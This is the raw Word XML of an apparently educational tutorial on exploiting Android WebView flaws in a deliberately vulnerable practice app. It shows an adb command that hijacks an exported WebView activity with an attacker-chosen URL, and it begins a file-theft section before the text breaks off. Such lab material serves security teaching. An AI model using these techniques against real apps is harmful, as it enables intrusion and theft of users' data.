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FA616" w14:textId="14315E80" w:rsidR="008E30AF" w:rsidRDefault="009E38EE" w:rsidP="00667CAA">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E38EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation of </w:t>
      </w:r>
      <w:r w:rsidR="00297292">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Android </w:t>
      </w:r>
      <w:r w:rsidRPr="00297292">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>WebView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3674E4" w14:textId="5F8307ED" w:rsidR="007C6482" w:rsidRPr="007C6482" w:rsidRDefault="007C6482" w:rsidP="007A7764">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2C46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F52225">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2C46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Ankit &amp;Jagdish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C1EE1" w14:textId="77777777" w:rsidR="007A7764" w:rsidRPr="007A7764" w:rsidRDefault="007A7764" w:rsidP="007A7764">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FABB77" w14:textId="77777777" w:rsidR="007A7764" w:rsidRDefault="007A7764" w:rsidP="007A7764"/>
    <w:p w14:paraId="58912ACE" w14:textId="10937BA2" w:rsidR="00782230" w:rsidRDefault="00782230" w:rsidP="007A7764">
      <w:r>
        <w:t xml:space="preserve">For the exploitation of WebView we’ll test out the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Vulnerable WebView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13197469" w14:textId="4F95AF9B" w:rsidR="00403752" w:rsidRDefault="00403752" w:rsidP="00DF5000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7013248B" wp14:editId="5E063F51">
            <wp:extent cx="3240000" cy="2164792"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="6985"/>
            <wp:docPr id="1512358773" name="Picture 151235877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58773" name="Picture 2" descr="A screenshot of a login p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000" cy="2164792"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B9085" w14:textId="77777777" w:rsidR="00AC6B19" w:rsidRDefault="00AC6B19" w:rsidP="00DE5909">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FE963D" w14:textId="77777777" w:rsidR="005C68A7" w:rsidRDefault="005C68A7" w:rsidP="005C68A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2845A64D" w14:textId="77777777" w:rsidR="00635EF3" w:rsidRDefault="00635EF3" w:rsidP="00635EF3">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD9DED3" w14:textId="77777777" w:rsidR="00635EF3" w:rsidRPr="00635EF3" w:rsidRDefault="00635EF3" w:rsidP="00635EF3">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECAFB7B" w14:textId="161D76C8" w:rsidR="00F240A0" w:rsidRDefault="00DE5909" w:rsidP="005C68A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00B2036C" w:rsidRPr="00B2036C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xported WebView (WebView Hijacking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432E69DA" w14:textId="77777777" w:rsidR="00635EF3" w:rsidRPr="00635EF3" w:rsidRDefault="00635EF3" w:rsidP="00635EF3"/>
    <w:p w14:paraId="739DA95C" w14:textId="77777777" w:rsidR="008E30AF" w:rsidRPr="008E30AF" w:rsidRDefault="008E30AF" w:rsidP="008E30AF"/>
    <w:p w14:paraId="1C9AE2AE" w14:textId="19EC5B81" w:rsidR="008F4F76" w:rsidRPr="008E30AF" w:rsidRDefault="008E30AF" w:rsidP="00D50740">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6728738A" wp14:editId="090412E4">
            <wp:extent cx="5731510" cy="1904605"/>
            <wp:effectExtent l="19050" t="19050" r="2540" b="635"/>
            <wp:docPr id="784164011" name="Picture 784164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4011"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04605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="268C6C4F" w14:textId="4287E266" w:rsidR="008F4F76" w:rsidRDefault="007C2951" w:rsidP="00B86A90">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72054655" wp14:editId="635FF393">
            <wp:extent cx="5760000" cy="2445415"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="0"/>
            <wp:docPr id="1154243585" name="Picture 115424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3585" name="Picture 1154243585"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="2445415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E11649" w14:textId="77777777" w:rsidR="007C2951" w:rsidRDefault="007C2951" w:rsidP="007C2951"/>
    <w:p w14:paraId="61CF5519" w14:textId="77777777" w:rsidR="00D1309D" w:rsidRDefault="00D1309D" w:rsidP="00D1309D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is clear that the loadWebView function is loading the URL by using the string that was obtained from the intent.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7F93F" w14:textId="657497A9" w:rsidR="00D1309D" w:rsidRDefault="00B86A90" w:rsidP="00B86A90">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44EB1160" wp14:editId="787BC554">
            <wp:extent cx="5760000" cy="2492001"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="3810"/>
            <wp:docPr id="979342966" name="Picture 97934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42966" name="Picture 979342966"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="2492001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD3BE9" w14:textId="77777777" w:rsidR="00B86A90" w:rsidRDefault="00B86A90" w:rsidP="00B86A90">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFC61E6" w14:textId="027C24FC" w:rsidR="00B86A90" w:rsidRDefault="003E1019" w:rsidP="00B86A90">
      <w:r>
        <w:t>In order to take advantage of this function, third-party applications can send an intent to this component along with a URL string, and the target application will accept and carry out the intent because this component has been exported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2F485" w14:textId="77777777" w:rsidR="006239C3" w:rsidRDefault="006239C3" w:rsidP="00B86A90"/>
    <w:p w14:paraId="1E6B6B03" w14:textId="2492CCAE" w:rsidR="00AC6B19" w:rsidRDefault="00553085" w:rsidP="00B86A90">
      <w:r>
        <w:t>In order to access a malicious URL provided by the attacker within the context of the application, we will use ADB to send an intent to the component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB8EAF" w14:textId="77777777" w:rsidR="00635EF3" w:rsidRDefault="00635EF3" w:rsidP="00B86A90"/>
    <w:p w14:paraId="2ABE2D90" w14:textId="669FBB91" w:rsidR="00E72F36" w:rsidRDefault="00E72F36" w:rsidP="00B86A90">
      <w:r>
        <w:t>Firstly, connect the emulator with adb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769E1D16" w14:textId="77777777" w:rsidR="00167D69" w:rsidRDefault="00167D69" w:rsidP="00B86A90"/>
    <w:p w14:paraId="4CDDCAF0" w14:textId="6F5A4F38" w:rsidR="00E72F36" w:rsidRDefault="00883897" w:rsidP="00B86A90">
      <w:r>
        <w:t>Use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E37DB" w14:textId="7890FAF0" w:rsidR="00883897" w:rsidRPr="00883897" w:rsidRDefault="00883897" w:rsidP="0088389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83897">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">adb shell am start -n componentname </w:t>
      </w:r>
      <w:r w:rsidR="00CB04A9" w:rsidRPr="007D47DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00883897">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">es string </w:t>
      </w:r>
      <w:r w:rsidR="00CB04A9" w:rsidRPr="007D47DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00883897">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA27D5" w14:textId="1508EBAA" w:rsidR="00883897" w:rsidRDefault="004E15B5" w:rsidP="00A36BE8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="004E15B5">
        <w:t>adb shell am start -n com.tmh.vulnwebview</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004E15B5">
        <w:t>/.Registr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008E2DE3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E15B5">
        <w:t xml:space="preserve">ationWebView --es </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E15B5">
        <w:t>reg_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E15B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00066BD8" w:rsidRPr="00C43B1D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://bing.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="290D43ED" w14:textId="4AA6A4AB" w:rsidR="00081206" w:rsidRDefault="004B6765" w:rsidP="00D50740">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76081D05" wp14:editId="630C6E46">
            <wp:extent cx="5760000" cy="3019118"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="0"/>
            <wp:docPr id="553702686" name="Picture 5537026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02686"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00" cy="3019118"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="261D2FEF" w14:textId="77777777" w:rsidR="00066BD8" w:rsidRDefault="00066BD8" w:rsidP="00B86A90"/>
    <w:p w14:paraId="1FA5D438" w14:textId="77777777" w:rsidR="005C68A7" w:rsidRDefault="005C68A7" w:rsidP="00CB29F2"/>
    <w:p w14:paraId="5D28E1A6" w14:textId="77777777" w:rsidR="00167D69" w:rsidRDefault="00167D69" w:rsidP="00CB29F2"/>
    <w:p w14:paraId="466FD765" w14:textId="77777777" w:rsidR="00167D69" w:rsidRDefault="00167D69" w:rsidP="00CB29F2"/>
    <w:p w14:paraId="7B35AE97" w14:textId="77777777" w:rsidR="00167D69" w:rsidRDefault="00167D69" w:rsidP="00CB29F2"/>
    <w:p w14:paraId="7187EBEF" w14:textId="77777777" w:rsidR="00167D69" w:rsidRDefault="00167D69" w:rsidP="00CB29F2"/>
    <w:p w14:paraId="0BC43131" w14:textId="77777777" w:rsidR="00167D69" w:rsidRDefault="00167D69" w:rsidP="00CB29F2"/>
    <w:p w14:paraId="13FAF77A" w14:textId="77777777" w:rsidR="007C3709" w:rsidRDefault="007C3709" w:rsidP="007C3709"/>
    <w:p w14:paraId="3CA2A611" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="40C44961" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="3E894684" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="7BEB7EB2" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="079B0E7F" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="11EB49E8" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="44155743" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="76A0803C" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="566E23D4" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="65B406DF" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="19531EE8" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="2D0C9884" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="5CD122EA" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="3E2E9887" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRPr="007C3709" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="1FBC84C3" w14:textId="5DD51937" w:rsidR="006B2F1F" w:rsidRPr="006B2F1F" w:rsidRDefault="006B2F1F" w:rsidP="006B2F1F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B2F1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>setAllowUniversalAccessFromFileURLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B2F1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled for WebView </w:t>
      </w:r>
      <w:r w:rsidR="00BA7329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000A36A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00BA7329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ile </w:t>
      </w:r>
      <w:r w:rsidR="000A36A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00BA7329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>heft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B02485" w14:textId="77777777" w:rsidR="007955CB" w:rsidRDefault="007955CB" w:rsidP="007C3709"/>
    <w:p w14:paraId="641E3C72" w14:textId="715CF330" w:rsidR="00944625" w:rsidRPr="00944625" w:rsidRDefault="00944625" w:rsidP="0094462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4625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker can </w:t>
      </w:r>
      <w:r w:rsidRPr="00944625">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>access material from any origin, including other file scheme URLs, when it is running within the context of a file scheme URL. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F816D4B" w14:textId="5E9063D8" w:rsidR="007955CB" w:rsidRDefault="00944625" w:rsidP="00944625">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64534137" wp14:editId="528FC51F">
            <wp:extent cx="5760000" cy="2504659"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="0"/>
            <wp:docPr id="1728464805" name="Picture 172846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4805" name="Picture 1728464805"/>
